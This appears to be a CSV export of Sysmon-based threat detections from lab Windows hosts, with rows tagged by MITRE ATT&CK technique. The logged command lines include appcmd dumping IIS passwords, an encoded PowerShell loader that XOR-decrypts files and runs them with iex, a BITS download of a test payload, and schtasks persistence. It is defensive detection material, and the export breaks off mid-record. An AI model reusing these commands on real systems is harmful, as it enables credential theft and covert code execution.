C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:password ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5961 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:19.433 + 365ABB72-3D6F-5CEB-0000-00100FC7FF00 + 2168 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:password + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1082] System Information Discovery,1589069393.260757,2020-05-10T04:09:53.260757+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 112972 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-05-10 00:09:43.370 + 747F3D96-4647-5EB7-0000-0010B3454B01 + 7672 + C:\Windows\System32\whoami.exe + 10.0.17763.1 (WinBuild.160101.0800) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + whoami.exe + whoami + c:\Users\IEUser\Tools\PrivEsc\ + NT AUTHORITY\SYSTEM + 747F3D96-3B92-5EB5-0000-0020E7030000 + 0x3e7 + 1 + System + SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88 + 747F3D96-4640-5EB7-0000-0010EF364B01 + 372 + C:\Windows\System32\cmd.exe + c:\Windows\System32\cmd.exe + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920559.403767,2019-05-27T05:29:19.403767+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:userName ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5958 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:19.353 + 365ABB72-3D6F-5CEB-0000-00104FC3FF00 + 2484 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:userName + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564913815.299641,2019-08-04T14:16:55.299641+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5951 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-04 10:16:50.403 + 747F3D96-B092-5D46-0000-001089041204 + 7792 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\system32\cmd.exe + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-56A3-5D45-0000-0020B3D31800 + 0x18d3b3 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-B091-5D46-0000-001081F71104 + 820 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c start C:\Windows\system32\cmd.exe + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1603490256.411768,2020-10-24T01:57:36.411768+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 424076 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-23 21:57:36.394 + 747F3D96-51D0-5F93-0000-0010B2B35B00 + 5572 + C:\Windows\SysWOW64\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + "C:\Windows\System32\cmd.exe" /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers + C:\Users\IEUser\AppData\Local\Temp\tmp1375\ + MSEDGEWIN10\IEUser + 747F3D96-4690-5F93-0000-002085A50800 + 0x8a585 + 1 + High + SHA1=E2EAD0993B917E1828A658ADA0B87E01D5B8424F,MD5=C43699F84A68608E7E57C43B7761BBB8,SHA256=2EDB180274A51C83DDF8414D99E90315A9047B18C51DFD070326214D4DA59651,IMPHASH=392B4D61B1D1DADC1F06444DF258188A + 747F3D96-51D0-5F93-0000-001036A15B00 + 3396 + C:\Windows\SysWOW64\rundll32.exe + "C:\Windows\System32\rundll32.exe" conf3234.dll f8753 d948 + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,1595802375.141778,2020-07-27T02:26:15.141778+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10 and IP ( 127.0.0.1 ) to hostname ( MSEDGEWIN10 ) , IP ( 127.0.0.1 ) and port ( 445 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 339223 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-07-26 22:13:19.375 + 747F3D96-FF9D-5F1D-0000-00100AC62400 + 7400 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + MSEDGEWIN10\IEUser + tcp + true + false + 127.0.0.1 + MSEDGEWIN10 + 49796 + + false + 127.0.0.1 + MSEDGEWIN10 + 445 + microsoft-ds + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920559.323652,2019-05-27T05:29:19.323652+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Filename: redirection.config" /text:password ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5955 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:19.283 + 365ABB72-3D6F-5CEB-0000-00108FBFFF00 + 168 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Filename: redirection.config" /text:password + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[ T1086 ] Powershell with Suspicious Argument,1564435984.008882,2019-07-30T01:33:04.008882+04:00,,Threat,Critical,"Found User (MSEDGEWIN10\IEUser) run Suspicious PowerShell commands that include ( -c ,-Destination ,-Destination,powershell,reg,Start-BitsTransfer,.txt, -c ,-Destination ,-Destination,powershell,reg,Start-BitsTransfer,.txt) in event with Command Line (powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (cmd /c powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1) in directory : ( C:\Windows\system32\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4895 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:03.695 + 747F3D96-660F-5D3F-0000-00106B508600 + 6720 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F + 747F3D96-660F-5D3F-0000-001055378600 + 2948 + C:\Windows\System32\cmd.exe + cmd /c powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1197] BITS Jobs - Process,1564435984.008882,2019-07-30T01:33:04.008882+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4895 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:03.695 + 747F3D96-660F-5D3F-0000-00106B508600 + 6720 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F + 747F3D96-660F-5D3F-0000-001055378600 + 2948 + C:\Windows\System32\cmd.exe + cmd /c powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "c:\Windows\System32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 112815 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-05-07 13:13:02.476 + 747F3D96-095E-5EB4-0000-0010D46F1800 + 5216 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + "c:\Windows\System32\cmd.exe" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-08F7-5EB4-0000-0020BAEC0200 + 0x2ecba + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-095E-5EB4-0000-001002511800 + 6396 + C:\Windows\System32\changepk.exe + "C:\Windows\system32\ChangePk.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1086] PowerShell Process found,1564435984.008882,2019-07-30T01:33:04.008882+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4895 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:03.695 + 747F3D96-660F-5D3F-0000-00106B508600 + 6720 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 + C:\Windows\system32\ + MSEDGEWIN10\IEUser 